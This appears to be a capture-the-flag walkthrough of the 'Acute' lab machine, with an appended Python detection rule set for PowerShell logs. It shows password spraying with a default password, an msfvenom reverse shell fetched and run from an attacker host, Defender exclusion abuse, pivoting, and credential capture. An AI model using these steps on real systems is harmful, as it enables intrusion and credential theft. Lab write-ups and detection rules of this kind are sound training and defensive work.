nmap -p- --min-rate 10000 -v -sV -sC -A -Pn 10.10.11.145
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: A4AA0018F1C83E9E4C63E9A839C56E5C
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after: 2030-01-04T06:34:58
| MD5: cf3a d387 8ede 75cf 89c1 8806 0b6b c823
|_SHA-1: f954 d677 0cf3 54df 3fa2 ed4f 78c3 1902 c120 a368
|_ssl-date: 2022-12-06T11:52:41+00:00; -4s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Only port 443 was found open. The certificate gives the hostname atsserver.acute.local, which goes into the hosts file.
Visiting the web site, Wappalyzer reports WordPress on IIS 10.0. The IIS short filename enumeration vulnerability is present.
To get around the certificate error, add the following at the top of the scanner script:
import ssl
try:
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    # Legacy Python that doesn't verify HTTPS certificates by default
    pass
else:
    # Handle target environment that doesn't support HTTPS verification
    ssl._create_default_https_context = _create_unverified_https_context
Unfortunately the three short filenames could never be resolved to full names. Clicking around the pages, the About page offers a download of New_Starter_CheckList_v7.docx.
Some information gathered from the document:
Three links:
https://atsserver.acute.local/Staff 404
https://atsserver.acute.local/Staff/Induction 404
https://atsserver.acute.local/Acute_Staff_Access login page
Administrator: Lois
Initial password that some staff may not have changed: Password1!
exiftool shows the document was created on Acute-PC01, creator FCastle, last modified by Daniel:
exiftool New_Starter_CheckList_v7.docx
Besides this, the web page also lists some user names:
Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins
From the information gathered so far, build a username wordlist in three formats: firstname, lastname, and first initial + lastname:
Aileen
Wallace
Awallace
Charlotte
Hall
Chall
Evan
Davies
Edavies
Ieuan
Monks
Imonks
Joshua
Morgan
Jmorgan
Lois
Hopkins
Lhopkins
After trying them by hand, Edavies with Password1! logs in to Acute-PC01 successfully.
Try to get a session in msf: generate the payload and start the listener.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=4444 EXITFUNC=thread -f exe -o 1.exe
Download and run it:
Invoke-WebRequest -Uri http://10.10.14.6:8000/1.exe -OutFile 1.exe
.\1.exe
It gets blocked.
There is also no permission to view tasklist, so gather information first and then decide whether AV evasion is worth attempting.
The c:\users directory also contains jmorgan, Natasha and administrator.ACUTE.
Listing drive letters shows a D: drive, but it cannot be entered:
get-psdrive -psprovider filesystem
A Defender whitelist (exclusion) directory turns up.
The network adapter information shows there is also an internal network; the other machine is 172.16.22.1.
The payload can now be copied to c:\utils and run from there to get a session, then a SOCKS tunnel can be started.
Add the route in msf:
background
use multi/manage/autoroute
set session 2
exploit
Start the SOCKS proxy in msf:
use auxiliary/server/socks_proxy
set srvport 1080
exploit
msf's new screenshare feature shows the user's desktop in real time, and we actually catch them typing a password:
acute\imonks, password w3_4R3_th3_f0rce, connecting to host atsserver.
Copying their steps gives an error, but running single commands works:
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $pass)
# errors
Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
# works
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type c:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type c:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
The content of wm.ps1 is:
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
So it logs back in to Acute-PC01 as jmorgan.
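From the defender's side, the steps above leave a clear trail in PowerShell script block logging (Event ID 4104). As an added example that is not part of the original writeup, here is a small Python rule set that flags the three behaviours used here (download-and-execute, a plaintext password wrapped with ConvertTo-SecureString, and remoting to another host with an explicit credential) when run over constructed script block text; host and user names are taken from the writeup, the events and the placeholder password are constructed.

```python
import re

# Each rule is a set of regexes that must ALL match one script block
# (case-insensitive), so a block is flagged on the whole behaviour pattern,
# not on a single keyword.
RULES = {
    # File fetched over HTTP with -OutFile and launched from the same block.
    "download_then_execute": [
        r"\bInvoke-WebRequest\b.*-OutFile\b",
        r"(^|[;\s])\.\\[\w.-]+\.(exe|ps1|bat)\b",
    ],
    # Password present in plaintext and wrapped into a SecureString.
    "plaintext_credential": [
        r"\bConvertTo-SecureString\b", r"-AsPlainText\b", r"-Force\b",
    ],
    # Remoting to another host with an explicit PSCredential object.
    "remoting_with_explicit_credential": [
        r"\b(Invoke-Command|Enter-PSSession)\b", r"-ComputerName\b", r"-Credential\b",
    ],
}

def detect(text):
    """Return the names of all rules whose every regex matches the script block."""
    flags = re.IGNORECASE | re.DOTALL
    return [name for name, pats in RULES.items()
            if all(re.search(p, text, flags) for p in pats)]

def scan(events):
    """events: (host, user, script_block_text) tuples. Return only the hits."""
    findings = []
    for host, user, text in events:
        hits = detect(text)
        if hits:
            findings.append((host, user, hits))
    return findings

# Constructed sample 4104 events modelled on the commands in this writeup;
# host and user names come from the writeup, the password is a placeholder.
SAMPLE_EVENTS = [
    ("Acute-PC01", "edavies",
     r"Invoke-WebRequest -Uri http://10.10.14.6:8000/1.exe -OutFile 1.exe; .\1.exe"),
    ("Acute-PC01", "edavies",
     '$pass = ConvertTo-SecureString "Example-P@ss" -AsPlainText -Force'),
    ("Acute-PC01", "edavies",
     "Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER "
     "-ConfigurationName dc_manage -Credential $cred"),
    ("Acute-PC01", "edavies", r"Get-ChildItem C:\Users"),  # benign, no hit
]
```

A download without a following execution, or a SecureString built from an encrypted standard string (as wm.ps1 does), does not trigger these rules, which keeps the rule set focused on the interactive pattern seen here.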